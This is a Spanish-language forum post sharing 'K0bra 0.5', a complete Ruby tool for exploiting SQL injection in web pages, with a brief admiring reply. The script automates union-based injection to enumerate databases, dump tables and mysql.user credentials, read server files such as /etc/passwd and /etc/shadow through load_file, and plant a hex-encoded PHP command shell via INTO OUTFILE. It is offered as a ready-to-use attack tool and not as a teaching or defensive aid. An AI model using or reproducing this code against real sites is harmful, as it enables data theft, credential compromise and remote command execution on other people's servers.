Autor Tema: [Ruby] K0bra 0.5 (Leído 6202 veces)

BigBear · « **en:** Julio 24, 2015, 06:12:30 pm »

Version mejorada de este script en Ruby para scannear la vulnerablidad SQLI en una pagina.

El script tiene las siguientes opciones :

Comprobar vulnerabilidad
Buscar numero de columnas
Buscar automaticamente el numero para mostrar datos
Mostras tablas
Mostrar columnas
Mostrar bases de datos
Mostrar tablas de otra DB
Mostrar columnas de una tabla de otra DB
Mostrar usuarios de mysql.user
Buscar archivos usando load_file
Mostrar un archivo usando load_file
Mostrar valores
Mostrar informacion sobre la DB
Crear una shell usando outfile
Todo se guarda en logs ordenados

El codigo :

Código: Ruby

#!usr/bin/ruby
#K0bra 0.5
#(C) Doddy Hackman 2015
 
require "net/http"
require "open-uri"
 
$files = ['C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/aca.txt','C:/xampp/htdocs/admin.php','C:/xampp/htdocs/leer.txt','../../../boot.ini','../../../../boot.ini','../../../../../boot.ini','../../../../../../boot.ini','/etc/passwd','/etc/shadow','/etc/shadow~','/etc/hosts','/etc/motd','/etc/apache/apache.conf','/etc/fstab','/etc/apache2/apache2.conf','/etc/apache/httpd.conf','/etc/httpd/conf/httpd.conf','/etc/apache2/httpd.conf','/etc/apache2/sites-available/default','/etc/mysql/my.cnf','/etc/my.cnf','/etc/sysconfig/network-scripts/ifcfg-eth0','/etc/redhat-release','/etc/httpd/conf.d/php.conf','/etc/pam.d/proftpd','/etc/phpmyadmin/config.inc.php','/var/www/config.php','/etc/httpd/logs/error_log','/etc/httpd/logs/error.log','/etc/httpd/logs/access_log','/etc/httpd/logs/access.log','/var/log/apache/error_log','/var/log/apache/error.log','/var/log/apache/access_log','/var/log/apache/access.log','/var/log/apache2/error_log','/var/log/apache2/error.log','/var/log/apache2/access_log','/var/log/apache2/access.log','/var/www/logs/error_log','/var/www/logs/error.log','/var/www/logs/access_log','/var/www/logs/access.log','/usr/local/apache/logs/error_log','/usr/local/apache/logs/error.log','/usr/local/apache/logs/access_log','/usr/local/apache/logs/access.log','/var/log/error_log','/var/log/error.log','/var/log/access_log','/var/log/access.log','/etc/group','/etc/security/group','/etc/security/passwd','/etc/security/user','/etc/security/environ','/etc/security/limits','/usr/lib/security/mkuser.default','/apache/logs/access.log','/apache/logs/error.log','/etc/httpd/logs/acces_log','/etc/httpd/logs/acces.log','/var/log/httpd/access_log','/var/log/httpd/error_log','/apache2/logs/error.log','/apache2/logs/access.log','/logs/error.log','/logs/access.log','/usr/local/apache2/logs/access_log','/usr/local/apache2/logs/access.log','/usr/local/apache2/logs/error_log','/usr/local/apache2/logs/error.log','/var/log/httpd/access.log','/var/log/httpd/error.log','/opt/lampp/logs/access_log','/opt/lampp/logs/error_log','/opt/xampp/logs/access_log','/opt/xampp/logs/error_log','/opt/lampp/logs/access.log','/opt/lampp/logs/error.log','/opt/xampp/logs/access.log','/opt/xampp/logs/error.log','C:\ProgramFiles\ApacheGroup\Apache\logs\access.log','C:\ProgramFiles\ApacheGroup\Apache\logs\error.log','/usr/local/apache/conf/httpd.conf','/usr/local/apache2/conf/httpd.conf','/etc/apache/conf/httpd.conf','/usr/local/etc/apache/conf/httpd.conf','/usr/local/apache/httpd.conf','/usr/local/apache2/httpd.conf','/usr/local/httpd/conf/httpd.conf','/usr/local/etc/apache2/conf/httpd.conf','/usr/local/etc/httpd/conf/httpd.conf','/usr/apache2/conf/httpd.conf','/usr/apache/conf/httpd.conf','/usr/local/apps/apache2/conf/httpd.conf','/usr/local/apps/apache/conf/httpd.conf','/etc/apache2/conf/httpd.conf','/etc/http/conf/httpd.conf','/etc/httpd/httpd.conf','/etc/http/httpd.conf','/etc/httpd.conf','/opt/apache/conf/httpd.conf','/opt/apache2/conf/httpd.conf','/var/www/conf/httpd.conf','/private/etc/httpd/httpd.conf','/private/etc/httpd/httpd.conf.default','/Volumes/webBackup/opt/apache2/conf/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf','/Volumes/webBackup/private/etc/httpd/httpd.conf.default','C:\ProgramFiles\ApacheGroup\Apache\conf\httpd.conf','C:\ProgramFiles\ApacheGroup\Apache2\conf\httpd.conf','C:\ProgramFiles\xampp\apache\conf\httpd.conf','/usr/local/php/httpd.conf.php','/usr/local/php4/httpd.conf.php','/usr/local/php5/httpd.conf.php','/usr/local/php/httpd.conf','/usr/local/php4/httpd.conf','/usr/local/php5/httpd.conf','/Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf','/Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf','/Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php','/Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php','/usr/local/etc/apache/vhosts.conf','/etc/php.ini','/bin/php.ini','/etc/httpd/php.ini','/usr/lib/php.ini','/usr/lib/php/php.ini','/usr/local/etc/php.ini','/usr/local/lib/php.ini','/usr/local/php/lib/php.ini','/usr/local/php4/lib/php.ini','/usr/local/php5/lib/php.ini','/usr/local/apache/conf/php.ini','/etc/php4.4/fcgi/php.ini','/etc/php4/apache/php.ini','/etc/php4/apache2/php.ini','/etc/php5/apache/php.ini','/etc/php5/apache2/php.ini','/etc/php/php.ini','/etc/php/php4/php.ini','/etc/php/apache/php.ini','/etc/php/apache2/php.ini','/web/conf/php.ini','/usr/local/Zend/etc/php.ini','/opt/xampp/etc/php.ini','/var/local/www/conf/php.ini','/etc/php/cgi/php.ini','/etc/php4/cgi/php.ini','/etc/php5/cgi/php.ini','c:\php5\php.ini','c:\php4\php.ini','c:\php\php.ini','c:\PHP\php.ini','c:\WINDOWS\php.ini','c:\WINNT\php.ini','c:\apache\php\php.ini','c:\xampp\apache\bin\php.ini','c:\NetServer\bin\stable\apache\php.ini','c:\home2\bin\stable\apache\php.ini','c:\home\bin\stable\apache\php.ini','/Volumes/Macintosh_HD1/usr/local/php/lib/php.ini','/usr/local/cpanel/logs','/usr/local/cpanel/logs/stats_log','/usr/local/cpanel/logs/access_log','/usr/local/cpanel/logs/error_log','/usr/local/cpanel/logs/license_log','/usr/local/cpanel/logs/login_log','/var/cpanel/cpanel.config','/var/log/mysql/mysql-bin.log','/var/log/mysql.log','/var/log/mysqlderror.log','/var/log/mysql/mysql.log','/var/log/mysql/mysql-slow.log','/var/mysql.log','/var/lib/mysql/my.cnf','C:\ProgramFiles\MySQL\MySQLServer5.0\data\hostname.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.log','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql.err','C:\ProgramFiles\MySQL\MySQLServer5.0\data\mysql-bin.log','C:\ProgramFiles\MySQL\data\hostname.err','C:\ProgramFiles\MySQL\data\mysql.log','C:\ProgramFiles\MySQL\data\mysql.err','C:\ProgramFiles\MySQL\data\mysql-bin.log','C:\MySQL\data\hostname.err','C:\MySQL\data\mysql.log','C:\MySQL\data\mysql.err','C:\MySQL\data\mysql-bin.log','C:\ProgramFiles\MySQL\MySQLServer5.0\my.ini','C:\ProgramFiles\MySQL\MySQLServer5.0\my.cnf','C:\ProgramFiles\MySQL\my.ini','C:\ProgramFiles\MySQL\my.cnf','C:\MySQL\my.ini','C:\MySQL\my.cnf','/etc/logrotate.d/proftpd','/www/logs/proftpd.system.log','/var/log/proftpd','/etc/proftp.conf','/etc/protpd/proftpd.conf','/etc/vhcs2/proftpd/proftpd.conf','/etc/proftpd/modules.conf','/var/log/vsftpd.log','/etc/vsftpd.chroot_list','/etc/logrotate.d/vsftpd.log','/etc/vsftpd/vsftpd.conf','/etc/vsftpd.conf','/etc/chrootUsers','/var/log/xferlog','/var/adm/log/xferlog','/etc/wu-ftpd/ftpaccess','/etc/wu-ftpd/ftphosts','/etc/wu-ftpd/ftpusers','/usr/sbin/pure-config.pl','/usr/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.conf','/usr/local/etc/pure-ftpd.conf','/usr/local/etc/pureftpd.pdb','/usr/local/pureftpd/etc/pureftpd.pdb','/usr/local/pureftpd/sbin/pure-config.pl','/usr/local/pureftpd/etc/pure-ftpd.conf','/etc/pure-ftpd/pure-ftpd.pdb','/etc/pureftpd.pdb','/etc/pureftpd.passwd','/etc/pure-ftpd/pureftpd.pdb','/var/log/pure-ftpd/pure-ftpd.log','/logs/pure-ftpd.log','/var/log/pureftpd.log','/var/log/ftp-proxy/ftp-proxy.log','/var/log/ftp-proxy','/var/log/ftplog','/etc/logrotate.d/ftp','/etc/ftpchroot','/etc/ftphosts','/var/log/exim_mainlog','/var/log/exim/mainlog','/var/log/maillog','/var/log/exim_paniclog','/var/log/exim/paniclog','/var/log/exim/rejectlog','/var/log/exim_rejectlog']
 
def toma(web)
  begin
    return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
  rescue
    return "Error"
  end
end
 
def decode_hex(text)
  text = text.sub("0x","")
  return [text].pack('H*')[0]
end
 
def encode_hex(text)
  return "0x"+text.unpack('H*')[0]
end
 
def copyright()
  print "\n-- == (C) Doddy Hackman 2015 == --\n"
  gets.chomp
  exit(1)
end
 
def installer()
  dir = Dir::pwd+"/"+"logs_webs"
  if not FileTest::directory?(dir)
    Dir::mkdir(dir)
  end
end
 
def savefile(file,text)
  url = URI.parse(file)
  save = File.open("logs_webs/"+url.host+".txt","a")
  save.puts text+"\n"
  save.close
end
 
def bypass(op)
  if op=="--"
    return "+","--"
  elsif op=="/*"
   return "/**/","/**/"
  elsif op=="%20"
   return "%20","%00"
  else
   return "+","--"    
  end
end
 
def head()
  clean()
  print "
  
 @      @@   @             
@@     @  @ @@             
 @ @@  @  @  @ @   @ @ @@@ 
 @ @   @  @  @@ @ @@@ @  @ 
 @@    @  @  @  @  @   @@@ 
 @ @   @  @  @  @  @  @  @ 
@@@ @   @@   @@@  @@@ @@@@@
 
"
end
 
def volverinicio()
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  inicio()
end
 
def clean()
  if RUBY_PLATFORM=~/win/ or RUBY_PLATFORM=~/min/
    system("cls")
  else
    system("clear")
  end
end
 
def retorno(url,by)
  print "\n[+] Finished"
  print "\n\n[+] Press any key to continue\n\n"
  gets.chomp
  central(url,by)
end
 
def gettables(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(table_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] Tables Found : #{total}\n")
    for num in ("17"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end 
end
 
def getcolumns(url,by,tablex)
  tablexa = encode_hex(tablex)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(column_name),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] Table : #{tablex}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tablexa+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end 
end
 
def getdbs(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,schema_name,0x4b30425241)))")
  print "\n[+] Getting DBS ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.schemata"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] DBS Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.schemata"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] DB Found : "+table+"\n"
        savefile(url,"[+] DB Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end 
end
 
def gettablesbydb(url,by,dbx)
  data  = encode_hex(dbx)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,table_name,0x4b30425241)))")
  print "\n[+] Getting tables ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Tables Found : ",total,"\n\n"
    savefile(url,"\n[+] DBS : #{dbx}")
    savefile(url,"[+] Tables Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.tables"+pass1+"where"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Table Found : "+table+"\n"
        savefile(url,"[+] Table Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end 
end
 
def getcolumnsbydb(url,by,db,tab)
  data = encode_hex(db)
  tabx = encode_hex(tab)
  
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,column_name,0x4b30425241)))")
  print "\n[+] Getting columns ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Columns Found : ",total,"\n\n"
    savefile(url,"\n[+] DB : #{db}")
    savefile(url,"[+] Table : #{tab}")
    savefile(url,"[+] Columns Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"information_schema.columns"+pass1+"where"+pass1+"table_name="+tabx+pass1+"and"+pass1+"table_schema="+data+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*?)K0BRA/
        table = $1
        print "[+] Column Found : "+table+"\n"
        savefile(url,"[+] Column Found : #{table}")
      end
    end
  else
    print "[-] Not Found\n"
  end 
end
 
def mysqluser(url,by)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,Host,0x4b30425241,0x4B3042524131,User,0x4B3042524131,0x4B3042524132,Password,0x4B3042524132)))")
   print "\n[+] Searching mysql.user\n\n"
  code1 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    print "[+] Users Mysql Found : ",total,"\n\n"
    savefile(url,"[+] Users Mysql Found : "+total+"\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+"mysql.user"+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRAK0BRA1(.*)K0BRA1K0BRA2(.*)K0BRA2/
        host,user,passw = $1,$2,$3
        print "[Host] : "+host
        print " [User] : "+user
        print " [Pass] : "+passw+"\n"   
        savefile(url,"[Host] : "+host)
        savefile(url,"[User] : "+user)
        savefile(url,"[Pass] : "+passw+"\n")
      end
    end
  else
    print "[-] Not Found\n"
  end
end
 
def details(url,by)
  pass1,pass2 = bypass(by)
  hextest = "0x2f6574632f706173737764" #/etc/passwd
  hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
  web1 = url.sub(/hackman/,"0x4b30425241")
  web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
  web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
   print "\n[+] Extrating information of the DB\n"
  code1 = toma(web2)
  if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
    user,data,ver = $1,$2,$3
    print "\n[+] Username : "+user
    print "\n[+] Database : "+data
    print "\n[+] Version : "+ver+"\n\n"
    savefile(url,"\n[+] Username : "+user)
    savefile(url,"[+] Database : "+data)
    savefile(url,"[+] Version : "+ver+"\n")
  else
    print "[-] Not Found\n"
  end
   code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
   code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
   code4 = toma(web3)
   if code2=~/K0BRA/
     print "[+] Mysql User : ON\n"
     savefile(url,"[+] Mysqluser : ON")
   end
   if code3=~/K0BRA/
     print "[+] information_schema : ON\n"
     savefile(url,"[+] information_schema : ON")
   end
   if code4=~/ERTOR854/
     print "[+] load_file : ON\n"
     savefile(url,"[+] load_file : ON")
   end   
   savefile(url,"") #espacio en blanco
 end
 
 def dumper(url,by,table,col1,col2)
  pass1,pass2 = bypass(by)
  web1 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,count(*),0x4b30425241)))")
  web2 = url.sub(/hackman/,"unhex(hex(concat(0x4b30425241,"+col1+",0x4b30425241,"+col2+",0x4b30425241)))")
  print "\n[+] Getting Values ...\n\n"
  code1 = toma(web1+pass1+"from"+pass1+table+pass2)
  if code1=~/K0BRA(.*?)K0BRA/
    total = $1
    savefile(url,"\n[+] Table : "+table)
    savefile(url,"[+] Column 1 : "+col1)
    savefile(url,"[+] Column 2 : "+col2)
    print "[+] Values Found : ",total,"\n"
    savefile(url,"\n[+] Values Found : #{total}\n")
    for num in ("0"..total)
      code2 = toma(web2+pass1+"from"+pass1+table+pass1+"limit"+pass1+num+",1"+pass2)
      if code2=~/K0BRA(.*)K0BRA(.*)K0BRA/
        uno,dos = $1,$2
        print "\n[+] "+col1+" : "+uno+"\n"
        print "[+] "+col2+" : "+dos+"\n"
        savefile(url,"\n[+] "+col1+" : "+uno)
        savefile(url,"[+] "+col2+" : "+dos)
      end
    end
  else
    print "[-] Not Found\n"
  end 
end
 
def fuzzfile(url,by)
  pass1,pass2 = bypass(by)
  print "\n[+] Fuzzing Files with load_file ....\n"
  $files.each do |file|
    res = file
    file = file.chomp
    file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]")
    end    
  end
  print "\n"
end
 
def abrirfile(url,by,file)
  pass1,pass2 = bypass(by)
  print "\n[+] Opening file ....\n"
  res = file
  file = encode_hex(file)
    web1 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+file+"),char(69,82,84,79,82,56,53,52))))")
    code = toma(web1)
    if code=~/ERTOR854(.*?)ERTOR854/m
      print "\n\n[File Found] : ",res
      print "\n\n[Source Start]\n"
      print $1
      print "\n[Source End]\n"
      savefile(url,"\n[File Found] : "+res)
      savefile(url,"\n[Source Start]\n")
      savefile(url,$1)
      savefile(url,"\n[Source End]\n")
    else
      print "\n\n[-] Error\n\n" 
    end 
       
end
 
def into(url,by,full,dir)
  pass1,pass2 = bypass(by)
  linea= "0x3c7469746c653e4d696e69205368656c6c20427920446f6464793c2f7469746c653e3c3f7068702069662028697373657428245f4745545b27636d64275d2929207b2073797374656d28245f4745545b27636d64275d293b7d3f3e"
  lugar = full+"/cmd.php"
  lugardos = dir+"/cmd.php"
  h = URI.parse(url)
  webtest = "http://"+h.host+lugardos
  web1 = url.sub(/hackman/,linea)
  formandoweb = web1+pass1+"into"+pass1+"outfile"+pass1+"'"+lugar+"'"+pass2
  toma(formandoweb)
  code = toma(webtest)
  if code=~/Mini Shell By Doddy/
    print "\n[Shell Up] : "+webtest+"\n"
    savefile(url,"\n[Shell Up] : "+webtest+"\n")
  else
    print "\n\n[-] Error\n"
  end
end
 
def central(url,by)
  clean()
  head()
  print "\n\n[+] Page : #{url}\n"
  print "[+] ByPass : #{by}\n\n"
 
  print "\n[information_schema]\n\n"
  print "1 - Show tables\n"
  print "2 - Show columns of the a table\n"
  print "3 - Show databases\n"
  print "4 - Show tables from the a DB\n"
  print "5 - Show columns from the a table of the DB\n"
  print "\n[mysql.user]\n\n"
  print "6 - Show users\n"
  print "\n[Others]\n\n"
  print "7 - Show details\n"
  print "8 - Dump data\n" 
  print "9 - Fuzz Files with load_file\n"
  print "10 - Load files with load_file\n"
  print "11 - Create Shell\n"
  print "12 - Show log\n"
  print "13 - Change target\n"
  print "14 - Exit\n\n\n"
  
  print "[+] Option : "
  op = gets.chomp
  print "\n"
   
  if op == "1"
    gettables(url,by)
    retorno(url,by)
  elsif op == "2"
    print "\n[+] Table : "
    table = gets.chomp
    getcolumns(url,by,table)
    retorno(url,by)
  elsif op == "3"
    getdbs(url,by)
    retorno(url,by)
  elsif op == "4"
    print "\n[+] DB : "
    db = gets.chomp
    gettablesbydb(url,by,db)
    retorno(url,by)
  elsif op == "5"
    print "\n[+] DB : "
    db = gets.chomp
    print "\n[+] Table : "
    tab = gets.chomp
    getcolumnsbydb(url,by,db,tab)
    retorno(url,by)
  elsif op == "6"
    mysqluser(url,by)
    retorno(url,by)
  elsif op == "7"
    details(url,by)
    retorno(url,by)
  elsif op == "8"
    print "\n[+] Table : "
    table = gets.chomp
    print "\n[+] Column 1 : "
    col1 = gets.chomp
    print "\n[+] Column 2 : "
    col2 = gets.chomp
    dumper(url,by,table,col1,col2)
    retorno(url,by)
  elsif op == "9"
    fuzzfile(url,by)
    retorno(url,by)
  elsif op == "10"
    print "\n[+] File : "
    file = gets.chomp
    abrirfile(url,by,file)
    retorno(url,by)
  elsif op == "11"
    print "\n[Full Source Discloure] : "
    full = gets.chomp
    print "\n[Directory to test] : "
    dir = gets.chomp
    into(url,by,full,dir)
    retorno(url,by)
  elsif op == "12"
    urla = URI.parse(url)
    ar = "logs_webs/"+urla.host+".txt"
    system("start #{ar}")
    retorno(url,by)
  elsif op == "13"
    inicio()
  elsif op == "14"
    copyright()
  else
    retorno(url,by)
  end
end
 
def findlength(url,by)
  pass1,pass2 = bypass(by)
  z = "1"
  print "\n[+] Finding columns lenght ...\n\n"
  x = "concat(0x4b30425241,1,0x4b30425241)"
  for num in ('2'..'25')
    z = z+","+num
    x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
    code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
    if code=~/K0BRA(.*?)K0BRA/
      print "[+] The Page has "+num+" columns\n"
      print "[+] The number "+$1+" print data"
      z = z.sub($1,"hackman")
      sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
      savefile(url,"[+] SQLI : "+sqli)
      savefile(url,"[+] Bypass : "+by+"\n")
      central(sqli,by)
    end
  end
  print "[-] Columns lenght not found\n"
  volverinicio()
end
 
def testvul(page,by) 
  pass1,pass2 = bypass(by)
  print "\n\n[+] Testing vulnerability ...\n\n"
  codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
  codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
  if codeuno != codedos
    print "[+] Vulnerable !\n"
    findlength(page,by)
  else
    print "[-] Not vulnerable\n"
    print "\n[+] Scan anyway y/n : "
    op = gets.chomp
    if op == "y"
      findlength(page,by)
    else
      volverinicio()
  end
 end  
end
 
def inicio()
  clean()
  head()
  print "\n\n[+] Page : "
  page = gets.chomp
  print "\n[+] Bypass : "
  by = gets.chomp
  if page=~/hackman/
    central(page,by)
  else
    testvul(page,by)
  end
end
 
installer()
inicio()
 
# The End ? 
 

Eso es todo.

L1zard · « **Respuesta #1 en:** Julio 24, 2015, 09:11:30 pm »

Super interesante el script

Starfield: el juego que revolucionará el espacio y la tecnología

Autor Tema: [Ruby] K0bra 0.5 (Leído 6202 veces)

BigBear

[Ruby] K0bra 0.5

L1zard

Re:[Ruby] K0bra 0.5